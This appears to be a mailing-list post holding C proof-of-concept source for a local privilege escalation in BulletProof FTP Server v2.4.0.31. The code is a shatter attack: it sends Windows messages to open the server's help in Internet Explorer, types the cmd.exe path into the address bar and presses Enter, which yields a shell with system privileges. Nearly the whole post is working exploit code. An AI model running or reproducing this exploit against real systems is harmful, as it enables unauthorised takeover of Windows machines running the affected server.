In-Reply-To: <80115b69050427102530b5ab91@xxxxxxxxxxxxxx> //****************************************************************************** //Privilege escalation in BulletProof FTP Server v2.4.0.31 //By Jerome Athias //jerome DOT athias AT free DOT fr //Discovered by Reed Arvin reedarvin[at]gmail[dot]com //( // //Little PoC //Gives you a shell with system privileges //****************************************************************************** #include "stdio.h" #include "windows.h" int main(int argc, char* argv[]) { HWND lHandle, lHandle2; char sText[]="%windir%\\system32\\cmd.exe"; char buffer[256]; lHandle=FindWindow(NULL, "BulletProof FTP Server v2.4.0.31"); if (!lHandle) { printf("\nUsage :\nBulletProof FTP Server v2.4.0.31 doesn't seem to run?\n"); return 0; } else { printf("handle for BulletProof : 0x%X\n",lHandle); } SetForegroundWindow(lHandle); SendMessage(lHandle, WM_IME_KEYDOWN, VK_F1, 0); //send F1 key "help me please!" Sleep(5000); //I need this time to drink a beer ;P //Find the browser Handle //lHandle2=FindWindow(NULL, "BPFTP Server - Mozilla Firefox"); //if (!lHandle2) //{ lHandle2=FindWindow("IEFrame", "BPFTP Server - Microsoft Internet Explorer"); lHandle2=FindWindowEx(NULL, NULL, "IEFrame", NULL); printf("handle for IE : 0x%X\n",lHandle2); if (!lHandle2) { printf("\nError while finding the browser's window.\n"); } //} //else //{ // printf("handle for Firefox : 0x%X\n",lHandle2); //} SetForegroundWindow(lHandle2); lHandle=FindWindowEx(lHandle2, 0, "WorkerW", 0); if (lHandle>=0) { lHandle = FindWindowEx(lHandle, 0, "ReBarWindow32", 0); if (lHandle>=0) { //Where are you Charlie... lHandle = FindWindowEx(lHandle, 0, "ComboBoxEx32", 0); lHandle = FindWindowEx(lHandle, 0, "ComboBox", 0); lHandle = FindWindowEx(lHandle, 0, "Edit", 0); } } else { printf("\nerror :-(\n"); } SendMessage(lHandle, WM_SETFOCUS, 0, 0); Sleep(300); SendMessage(lHandle, WM_SETTEXT, 0, (LPARAM) sText); //Shatter! PostMessage(lHandle, WM_KEYDOWN, VK_RETURN, 0); //whoami? :-) return 0; }